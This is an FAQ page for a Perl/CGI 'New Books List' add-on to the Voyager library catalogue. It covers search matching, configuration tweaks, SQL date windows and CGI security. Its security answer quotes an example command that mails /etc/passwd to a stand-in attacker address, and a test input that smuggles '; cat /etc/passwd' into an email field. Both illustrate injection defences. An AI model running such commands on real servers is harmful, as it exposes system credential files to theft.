Michael Doran Home Page

New Books List

Frequently Asked Questions




How does the keyword searching work?
The keyword searching facility has not previously been documented 
and there are a few wrinkles to how searches are handled.  Eventually 
I will distribute a "Help page" that will explain it, but here 
are the basics...

All keyword searches are regular expression matches against:
 1) The title (i.e. the "245" field)
 2) The author
 3) The display call number

However, the search term must be at least two characters long to 
be matched against the title or author; a single-character search 
term is matched against the call number only. 
This allows a patron to retrieve all the new items with a call 
number starting with (for example) "Q" or "M" without getting a lot 
of false hits on authors and titles.  Call number searches longer 
than one character are a lot less likely to return false hits 
against titles or authors.

When a user does an "author" search (I have it in quotes because, 
as I've stated above, every search over 1 character gets matched 
against all three things) they should get a hit either by searching 
"last_name, first_name" or "first_name last_name".  The search 
will pick up the first syntax by matching against the author value 
and the second syntax because it is also matching against author 
information in the 245 field.
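
The matching rules above can be sketched roughly as follows.  This is 
not the actual newbooks.cgi code: the record layout, the sub name 
keyword_match, the case-insensitive matching, the literal quoting of 
the search term, and the anchoring of the call number match at the 
start of the string are all assumptions made for illustration.

```perl
use strict;
use warnings;

# Hypothetical records; the real field names in newbooks.cgi may differ.
my @records = (
    { title   => 'Quantum physics / by Jane Roe',
      author  => 'Roe, Jane',
      call_no => 'QC174 .R64' },
    { title   => 'Music theory / by Max Quill',
      author  => 'Quill, Max',
      call_no => 'MT6 .Q55' },
);

# Return 1 if the search term matches the record, 0 otherwise.
sub keyword_match {
    my ($term, $rec) = @_;
    return 0 unless length $term;

    # Assumption: the term is matched literally and case-insensitively.
    my $re = qr/\Q$term\E/i;

    # Every term, even a single character, is tried against the call number.
    return 1 if $rec->{call_no} =~ /^$re/;

    # Terms shorter than two characters stop here.
    return 0 if length($term) < 2;

    # Longer terms are also tried against the title (245) and the author.
    return ($rec->{title} =~ $re || $rec->{author} =~ $re) ? 1 : 0;
}

for my $term ('Q', 'Roe, Jane', 'Jane Roe') {
    my @hits = grep { keyword_match($term, $_) } @records;
    print "$term: ", scalar(@hits), " hit(s)\n";
}
```

In this sketch "Roe, Jane" hits via the author value and "Jane Roe" 
hits via the author statement in the 245 field, while "Q" only hits 
the record whose call number starts with Q.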

Occasionally, a search will return entries that don't seem like 
matches to the search term.  This is because the full 245 field is 
no longer displayed in the results, as it was in version 2.0.  (For 
display, it is now truncated at the "/" character.)  So if a search 
term matches (for example) on an illustrator's name in the 245 
field, it will be retrieved, but that name won't appear in the 
author column of the results page.  (Clicking on the link to the 
actual WebVoyage record will solve those mysteries.)
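
A small sketch of why such "mystery" hits occur, assuming the display 
value is simply everything before the first "/" in the 245 string.  
The sub name display_title and the sample record are made up for 
illustration; the real truncation code in newbooks.cgi may differ.

```perl
use strict;
use warnings;

# Return the part of a 245 string that would be shown in the results:
# everything before the first "/", with trailing whitespace removed.
sub display_title {
    my ($field_245) = @_;
    (my $shown = $field_245) =~ s{\s*/.*\z}{}s;
    return $shown;
}

my $field_245 = 'The hobbit / J.R.R. Tolkien ; illustrated by Alan Lee';
my $term      = 'Alan Lee';

# The search runs against the full 245 string...
print "matched\n" if $field_245 =~ /\Q$term\E/i;

# ...but only the truncated form is displayed, so the name is not visible.
print "displayed as: ", display_title($field_245), "\n";
```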

The keyword search function was a little added bonus that I didn't 
want to clutter up with a lot of user options.  I tried to program 
it so that a search would return what the user would intuitively 
expect it to, regardless of what they plug in as a search term.  
I've not done usability testing to determine if I was successful, 
but I'm very interested in feedback from the trenches.

Update: Version 4.0 now has a configuration option in newbooks.cgi
to allow for full display of the 245 field, if desired. 


Record titles and locations are centered rather than left-justified when viewed with the Internet Explorer 6.0 browser. How can this be fixed?
Internet Explorer 6.0 centers the content in table cells if the table 
is placed within a div element that has the align attribute set
to "center."  The HTML code of newbooks.cgi has been tweaked so that
pages look OK.  The current 4.0 download tarball has the fix.  (This 
only affected newbooks.cgi; the newbooks.pl program was not changed.) 


We're still running Voyager 99.1. Can we use version 3.x of the New Books List?
Yes, with a little tweaking. The newbooks.cgi program creates links back to 
WebVoyage for each item. These "canned search" links work in 2000.1 
but won't work in 99.1 until you adjust that part of the code. 
(Endeavor changed the search query syntax between 99.1 and 2000.1.)  

Example of code used in New Books List 2.0 (for Voyager 99.1):
/cgi-bin/Pwebrecon.cgi?DB=local&SA1=$isbn_only&BOOL1=as+a+phrase
&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page

Example of code used in New Books List 3.x (for Voyager 2000.1):
/cgi-bin/Pwebrecon.cgi?DB=local&Search_Arg=ISBN+%22$isbn_only%22
&SL=None&Search_Code=CMD&CNT=10
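
If you need to support both releases, one approach is to build the 
link in a small sub that switches on the Voyager version.  This is a 
sketch only: the sub name canned_search_link and the version argument 
are hypothetical, and it assumes the two-line examples above are 
single URLs that were wrapped for display.

```perl
use strict;
use warnings;

# Build a "canned search" link back to WebVoyage for one ISBN.
# $voyager_version is a hypothetical switch: '99.1' selects the older
# query syntax, anything else selects the 2000.1 syntax.
sub canned_search_link {
    my ($isbn_only, $voyager_version) = @_;
    my $base = '/cgi-bin/Pwebrecon.cgi?DB=local';

    if ($voyager_version eq '99.1') {
        return $base . "&SA1=$isbn_only&BOOL1=as+a+phrase"
                     . '&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page';
    }
    return $base . "&Search_Arg=ISBN+%22$isbn_only%22"
                 . '&SL=None&Search_Code=CMD&CNT=10';
}

print canned_search_link('0131103628', '99.1'),   "\n";
print canned_search_link('0131103628', '2000.1'), "\n";
```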

Also, the new books list search form as generated by the newbooks.cgi 
program has been designed to mimic the Voyager 2000.1 look.  If you 
find this to be an aesthetic problem, the newbooks.cgi program 
provides a way of disabling the default search form so that you can 
create your own.


How can I add a "New Books" tab to all the WebVoyage search screens?
Adding tabs to all the search screens can be accomplished by editing
the Tab_Text entry in the Course_Reserve_Search_Page stanza of the
/m1/voyager/xxxdb/etc/webvoyage/local/opac.ini file.
  Replace this:
	Tab_Text=Course Reserves
  With this:
        Tab_Text=Course Reserves</a> &nbsp; </font>&nbsp;
        </th></tr></table></td><td>&nbsp;&nbsp;</td>
        <td><table border="0" cellspacing="0" cellpadding="0">
        <tr><th nowrap bgcolor="#003f7c">&nbsp;<font
        color="#fcf7ea">&nbsp; <a style="color:#fcf7ea"
        href="/cgi-bin/newbooks.cgi">New Books</a>
Note: There shouldn't be any line breaks.  You will have to adjust 
font, background, and style colors to match your site's scheme.

Credit: This solution comes courtesy of Alan Keely.  Thanks Alan! 


Can we make the "In Process" message go away, or change it to something else?
I think all you have to do is edit a couple of lines down in the 
guts of the newbooks.pl program.

Try replacing each occurrence of this line
	else { print OUTFILE " In Process\t"; }
with this
	else { print OUTFILE " &nbsp;\t"; }

The no-break-space character (&nbsp;) will not display, but will 
be a placeholder in the cell element of the table when items are 
displayed.

Also make sure that $in_process_page is set to "no" in newbooks.cgi.

I *think* this should do the job without having any unwanted 
side effects, but haven't tested it.


We want to change the date range to monthly, going back 6 months... It looks like the newbooks.pl and newbooks.cgi will both need some modifications.
Yes, that can be done and you are right that both programs will 
need modification.  The University of Rochester has done just that.
(see: http://groucho.lib.rochester.edu/cgi-bin/newbooks.cgi)

I definitely encourage people to modify the programs to suit the 
needs of their institutions.  As I make enhancements myself, I also 
try to keep in mind that the New Books List is only meant to fill 
a tiny niche.  Do we really want it to do the things that WebVoyage 
does much better?  Library staff, rather than patrons, are often 
the ones that want the longer time periods (as an aid to gathering 
statistics).  Data like that are probably better obtained via 
alternate Voyager reporting options.

Update: I have acceded to numerous requests for this functionality.
Version 4.0 now offers the option of retrieving either 4 months or 
4 weeks of new items. -mdd


I get a "Can't locate DBI.pm" error message when I try to run newbooks.pl. What's wrong?
Endeavor installs the DBI.pm and DBD.pm Perl modules as part of the 
Voyager 2000.1.x or higher upgrades.  It's quite possible that the 
error indicates that Perl is simply looking in the wrong place.  
Try changing the top line of newbooks.pl from this:
	#!/usr/local/bin/perl -w
to this:
	#!/usr/bin/perl -w
That way, it will look for modules in the /usr/lib directory rather 
than the /usr/local/lib directory.  This difference has to do with 
where and how Perl was originally installed on a particular server.

If that doesn't solve the problem, verify that you have the DBI.pm 
module by running this command: 
	find /usr -name DBI.pm  
If that does not locate the module, you may not have it installed.
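
Another way to check is to ask Perl itself.  The following sketch 
(the sub name module_available is made up for illustration) prints 
which interpreter is running, the directories it searches for 
modules, and whether DBI can be loaded from any of them.  Run it 
once with each of the two "#!" lines above to compare.

```perl
use strict;
use warnings;

# Return 1 if the named module can be loaded by this interpreter, else 0.
sub module_available {
    my ($module) = @_;
    (my $file = "$module.pm") =~ s{::}{/}g;   # e.g. Foo::Bar -> Foo/Bar.pm
    return eval { require $file; 1 } ? 1 : 0;
}

print "Perl interpreter: $^X\n";
print "Module search path (\@INC):\n";
print "  $_\n" for @INC;
print "DBI is ", (module_available('DBI') ? '' : 'NOT '), "available\n";
```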


We have a split server arrangement. We're trying to run newbooks.pl from one of the Voyager application servers rather than the Voyager database server, but I'm getting Oracle connection errors. How can we make it work?
If you are attempting to run newbooks.pl from a server that's NOT the 
Voyager database server, the Oracle connect statement needs to contain 
additional information.

Try changing this line:
    my $dbh = DBI->connect('dbi:Oracle:', $username, $password)
to this:
    my $dbh = DBI->connect('dbi:Oracle:host=host_name;sid=LIBR;port=1521',
                           $username, $password)

Substitute your Voyager server name for "host_name" in the line above.  
THIS WILL ONLY WORK IF the correct Oracle components and the Perl 
DBI/Oracle DBD modules are already available on the application server.
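
If the same copy of newbooks.pl has to run on both kinds of server, 
the connect string could be assembled in one place.  A sketch, with 
assumptions: the sub name oracle_dsn and the host name 
voyager.example.edu are hypothetical, and the defaults (sid LIBR, 
port 1521) are simply the values from the example above.  The actual 
connect call is left commented out because it needs a live Oracle 
listener.

```perl
use strict;
use warnings;

# Build the DBI data source string.  With no host, return the local
# form used when running on the database server itself.
sub oracle_dsn {
    my (%opt) = @_;
    return 'dbi:Oracle:' unless defined $opt{host};

    my $sid  = defined $opt{sid}  ? $opt{sid}  : 'LIBR';
    my $port = defined $opt{port} ? $opt{port} : 1521;
    return "dbi:Oracle:host=$opt{host};sid=$sid;port=$port";
}

my $dsn = oracle_dsn(host => 'voyager.example.edu');
print "$dsn\n";

# my $dbh = DBI->connect($dsn, $username, $password)
#     or die "Connect failed: $DBI::errstr";
```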


Why aren't there any government documents in newbooks.txt?
If you choose SQL option 1 in newbooks.pl, retrieval is based on 
acquisitions line item received, so it will not pull any government 
documents because they are not ordered and paid for through acquisitions.  
SQL option 2 is based on bib item add date, so should include 
government documents.

Update: The original SQL options have been superseded by version
4.0's improved SQL statement, so there is no longer any retrieval
based on acquisitions criteria.  


I'm not sure what to use for location "fragments" in the newbooks.ini program. Can you explain what they do?
Each "fragment" is a subset/part/fragment (chosen by you) of the text 
strings that are extracted from the xxxdb.location.location_display_name 
field of the Voyager database.  The fragment is used to do a Perl 
regular expression match against the full string.  So you simply want to 
select a fragment that will match the intended location(s) and not any 
other locations.  

In UTA's case, for example, "Special" matches all the locations in our 
Special Collections department, but will not match any locations in the 
branches or the areas of the Central Library not included in Special 
Collections.  I could probably have used "Collect" as the fragment 
instead (it needn't be a whole word).

"Special" will regexp match against these locations:
	Special Collections, Floor 6: (Non-circulating)
	Special Collections, Floor 6: Garrett (Non-circulating)
	etc.

"Science" will regexp match against that branch library's locations:
	Science & Engineering Library
	Science & Engineering Library: Reserve
	Science & Engineering Library: Reference

Again, I could just as easily have used "Engineering" as the location 
fragment to match all the locations in the Science & Engineering 
Library.
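
A quick way to try out a candidate fragment before putting it in the 
configuration is to run it against your own list of location display 
names.  This sketch uses the UTA names listed above; the sub name 
locations_for_fragment is made up for illustration and is not part of 
the distributed programs.

```perl
use strict;
use warnings;

my @locations = (
    'Special Collections, Floor 6: (Non-circulating)',
    'Special Collections, Floor 6: Garrett (Non-circulating)',
    'Science & Engineering Library',
    'Science & Engineering Library: Reserve',
    'Science & Engineering Library: Reference',
);

# Return the location names that the fragment matches as a regular expression.
sub locations_for_fragment {
    my ($fragment, @names) = @_;
    my @hits = grep { /$fragment/ } @names;
    return @hits;
}

for my $fragment ('Special', 'Collect', 'Science', 'Engineering') {
    my @hits = locations_for_fragment($fragment, @locations);
    print "\"$fragment\" matches ", scalar(@hits), " location(s)\n";
    print "\t$_\n" for @hits;
}
```

A fragment that matches more locations than intended is too short or 
too general; one that matches none probably contains a typo.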


Many of the items in our list have not been cataloged yet. Is there a way of reducing the proportion of "In Process" items?
You might want to consider adjusting the date range for items that 
are extracted.  The default is a four-week window that ranges 
from 1 week ago to 5 weeks ago.  

You could slide that four-week window so it covers from 2 weeks ago 
to 6 weeks ago.  With a two-week, rather than a one-week, cushion, 
more items should have made it to the shelves.

To accomplish that you will need to edit newbooks.pl...

change this line:
  (ceil ((sysdate - status_date) / 7) - 1)
to this:
  (ceil ((sysdate - status_date) / 7) - 2)

change this line:
  (status_date between (sysdate - 35) and (sysdate - 7))
to this:
  (status_date between (sysdate - 42) and (sysdate - 14))

change this line:
  (ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 1)
to this:
  (ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 2)

change this line:
  ($db_name.bib_item.add_date between (sysdate - 35) and (sysdate - 7))
to this:
  ($db_name.bib_item.add_date between (sysdate - 42) and (sysdate - 14))
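
The numbers in those edits all follow from one "lag" value in weeks: 
the recent edge of the window is 7 x lag days ago and the far edge is 
28 days beyond that.  The sketch below just does that arithmetic; the 
sub names date_window and window_sql are made up for illustration and 
do not appear in newbooks.pl.

```perl
use strict;
use warnings;

# Return (oldest, newest) edges of the four-week window, in days ago.
sub date_window {
    my ($lag_weeks) = @_;
    my $newest = 7 * $lag_weeks;   # cushion before items are listed
    my $oldest = $newest + 28;     # four weeks further back
    return ($oldest, $newest);
}

# Build the "between" clause for a given date column and lag.
sub window_sql {
    my ($column, $lag_weeks) = @_;
    my ($oldest, $newest) = date_window($lag_weeks);
    return "($column between (sysdate - $oldest) and (sysdate - $newest))";
}

print window_sql('status_date', 1), "\n";   # the default one-week cushion
print window_sql('status_date', 2), "\n";   # the two-week cushion
```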

Update: This solution has been incorporated into version 4.0 as the 
"lag time" option.  -mdd


I would like to use the newbooks.pl script in such a way that it'll print to STDOUT as follows "./newbooks.pl > newbooks.txt". This is because I'm maintaining two databases and I would like to use the same script for both.
The easiest way to do this is to assign the value of the $out_file
variable from a parameter that is passed to the script.  Something 
similar to this:

    if (! ($#ARGV == 0)) {
        print "Usage: $0 output_file\n";
        exit(1);
    } else {
        $out_file = shift;
    }

Then you would run it like this: ./newbooks.pl newbooks.txt
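
If you really do want the "./newbooks.pl > newbooks.txt" form, a 
variation is to fall back to STDOUT when no file name is given.  This 
is an untested sketch, not code from newbooks.pl: the sub name 
open_output and the $out handle are hypothetical, and the script's 
existing print OUTFILE statements would have to be changed to print 
to the returned handle.

```perl
use strict;
use warnings;

# Return a write handle: the named file if one is given, otherwise STDOUT.
sub open_output {
    my ($out_file) = @_;
    return \*STDOUT unless defined $out_file && length $out_file;
    open(my $fh, '>', $out_file) or die "Cannot write $out_file: $!";
    return $fh;
}

my $out = open_output($ARGV[0]);
print {$out} "Title\tAuthor\tCall number\n";
```

Both "./newbooks.pl newbooks.txt" and "./newbooks.pl > newbooks.txt" 
would then produce the same file.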


My system administrator is concerned about the security of the newbooks.cgi program. Do we have anything to worry about?
Here are some relevant questions to ask regarding CGI scripts...

1) What does the CGI script do with user input?

The most common CGI exploit is when a hacker includes shell 
metacharacters in form input as a way of running system commands on 
the web server. If the script itself does not attempt to run any 
system commands using form input, then form data containing shell 
metacharacters is not a concern.  (A common case of a system command 
in CGI scripts is when the script invokes a Unix mail program.)

If a script *does* use user supplied input (i.e. data included in
the name/value pairs read in from the form) somewhere in a system 
call, then yes, there should be concern.  In newbooks.cgi, the 
ReadParse function checks for shell metacharacters and replaces 
them with spaces.
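
For readers unfamiliar with the technique, replacing metacharacters 
with spaces looks roughly like the sketch below.  This is not the 
ReadParse code from newbooks.cgi: the sub name strip_shell_metachars 
and the particular list of characters are assumptions chosen for 
illustration.

```perl
use strict;
use warnings;

# Replace characters that are special to the shell with spaces.
# The character list here is illustrative, not the one in newbooks.cgi.
sub strip_shell_metachars {
    my ($value) = @_;
    $value =~ s/[;<>*|&\$!?~(){}\[\]'"\\`\n]/ /g;
    return $value;
}

print strip_shell_metachars('Twain, Mark'), "\n";
print strip_shell_metachars('a;b|c'), "\n";
```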

If only one piece of user input is a potential security problem, 
it is good to subject *it* to closer taint scrutiny.  For example, 
in newbooks.cgi v. 3.x in which mailx is used, the user-supplied 
email address is subjected to this test (which checks that the 
input begins with something shaped like an email address):

    # ...then check for valid characters
    unless ( $mail_address =~ /^\w{1}[\w\-\.]*\@[\w\-\.]+/ ) {
        # if "bad" 
        &MailAck("faulty");
    }

It's generally better to check input for what it *should* be, rather 
than for what it *shouldn't* be.  "What it should be" is a small set 
that is easy to describe, whereas "what it shouldn't be" is open-ended 
and easy to get wrong, so the former is the more secure evaluation.
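
One detail worth knowing when writing this kind of test: a pattern 
that is anchored only at the start will accept any trailing text 
after a valid-looking beginning.  The sketch below compares the v3.x 
pattern quoted above with a stricter variant anchored at both ends.  
The sub name looks_like_email and its pattern are illustrative 
assumptions, not code from newbooks.cgi, and the pattern is 
deliberately narrower than the full range of legal email addresses.

```perl
use strict;
use warnings;

# The v3.x test quoted above: anchored at the start only.
my $v3_pattern = qr/^\w{1}[\w\-\.]*\@[\w\-\.]+/;

# Stricter variant: the whole string must be name@host.domain and
# nothing else.
sub looks_like_email {
    my ($addr) = @_;
    return 0 unless defined $addr;
    return $addr =~ /\A\w[\w.\-]*\@[\w\-]+(?:\.[\w\-]+)+\z/ ? 1 : 0;
}

for my $input ('patron@example.edu',
               'patron@example.edu; cat /etc/passwd') {
    my $old = $input =~ $v3_pattern     ? 'accepted' : 'rejected';
    my $new = looks_like_email($input)  ? 'accepted' : 'rejected';
    print "[$input] start-anchored: $old, fully anchored: $new\n";
}
```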

2) Who is your "httpd" user?

If your Apache web server is properly configured, httpd processes 
are owned by the user "nobody" and therefore CGI programs are 
executed by "nobody."  This means that unless you have world-
writable files and directories, the damage that can be done by a 
malicious user is minimal. 

They may however still be able to run unintended applications and 
read files - the classic example is something along the lines of 
'mailx hacker@blackhat.com < /etc/passwd'.

This is not meant to be a comprehensive overview of CGI security;
it is intended to assure you that I was aware of security issues 
when the programs were written.